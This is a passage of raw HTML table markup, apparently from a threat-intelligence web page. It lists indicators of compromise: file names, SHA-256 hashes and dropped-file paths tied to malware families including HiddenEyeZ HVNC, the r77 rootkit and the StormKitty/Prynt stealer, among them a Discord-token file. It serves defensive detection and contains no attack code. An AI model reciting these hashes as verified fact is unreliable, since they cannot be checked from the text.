class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2232140\" class=\"desktop-view tr_class_2232140 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_38210343\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38210343\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_38210343\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77-x64.dll<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_72203781\" rowspan=\"1\" colspan=\"1\" class=\"td_class_72203781\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_72203781\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_51045841\" rowspan=\"1\" colspan=\"1\" class=\"td_class_51045841\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_51045841\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 (Dll 64 bits)<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7176425\" class=\"desktop-view tr_class_7176425 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_63747558\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63747558\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63747558\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77-x86.dll<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81380288\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81380288\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81380288\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ed3ee849ae71001941d03983a65eacdd726be75d91b076475a89a3a75e79d82e<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61590812\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61590812\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61590812\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 (Dll 32 bits)<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5029327\" class=\"desktop-view tr_class_5029327 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_99941391\" rowspan=\"1\" colspan=\"1\" class=\"td_class_99941391\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_99941391\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\"> <\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_53506720\" rowspan=\"1\" colspan=\"1\" class=\"td_class_53506720\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_53506720\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ba1615c7617f148228c587ffe7607ac841fd682ba4905f4af53e18d601b84102<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_75939967\" rowspan=\"1\" colspan=\"1\" class=\"td_class_75939967\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_75939967\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9106279\" class=\"desktop-view tr_class_9106279 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_58473188\" rowspan=\"1\" colspan=\"1\" class=\"td_class_58473188\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_58473188\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">rescale.ps1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_57347672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_57347672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_57347672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">a10479eea5f9d85ac00db77c0e090de2db64cdb163055e7b42fbcb2c97a66898<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_62756446\" rowspan=\"1\" colspan=\"1\" class=\"td_class_62756446\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_62756446\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_14\"\n     id='ninja_table_builder_414264'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_14\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414264\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6882207\" class=\"desktop-view tr_class_6882207 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_69390267\" rowspan=\"1\" colspan=\"1\" class=\"td_class_69390267\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_69390267\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Path<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_48781154\" rowspan=\"1\" colspan=\"1\" class=\"td_class_48781154\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_48781154\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9916506\" class=\"desktop-view tr_class_9916506 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_38476109\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38476109\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_38476109\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%proclog.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27588435\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27588435\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27588435\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1131809\" class=\"desktop-view tr_class_1131809 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_57384229\" rowspan=\"1\" colspan=\"1\" class=\"td_class_57384229\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_57384229\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%drive.bat<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_34924618\" rowspan=\"1\" colspan=\"1\" class=\"td_class_34924618\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_34924618\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5523417\" class=\"desktop-view tr_class_5523417 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_48746926\" rowspan=\"1\" colspan=\"1\" class=\"td_class_48746926\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_48746926\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%HiddenEyeZ.zip<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_90677731\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90677731\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90677731\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2437905\" class=\"desktop-view tr_class_2437905 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_97234173\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97234173\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97234173\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%svchost.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_53024053\" rowspan=\"1\" colspan=\"1\" class=\"td_class_53024053\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_53024053\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper \/ HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2639852\" class=\"desktop-view tr_class_2639852 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_68426643\" rowspan=\"1\" colspan=\"1\" class=\"td_class_68426643\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_68426643\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%svchost.bat<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_71976866\" rowspan=\"1\" colspan=\"1\" class=\"td_class_71976866\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_71976866\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper \/ HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2977869\" class=\"desktop-view tr_class_2977869 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_29205679\" rowspan=\"1\" colspan=\"1\" class=\"td_class_29205679\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_29205679\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">rescale.ps1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81574334\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81574334\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81574334\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper \/ HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5156094\" class=\"desktop-view tr_class_5156094 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_35772915\" rowspan=\"1\" colspan=\"1\" class=\"td_class_35772915\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_35772915\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">MessengerDiscordtokens.txt<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_92535347\" rowspan=\"1\" colspan=\"1\" class=\"td_class_92535347\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_92535347\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4586462\" class=\"desktop-view tr_class_4586462 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_30277754\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30277754\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30277754\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZlockfile<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_71375034\" rowspan=\"1\" colspan=\"1\" class=\"td_class_71375034\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_71375034\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_4488735\" class=\"desktop-view tr_class_4488735 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_34441429\" rowspan=\"1\" colspan=\"1\" class=\"td_class_34441429\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_34441429\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">%TEMP%rkd.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> 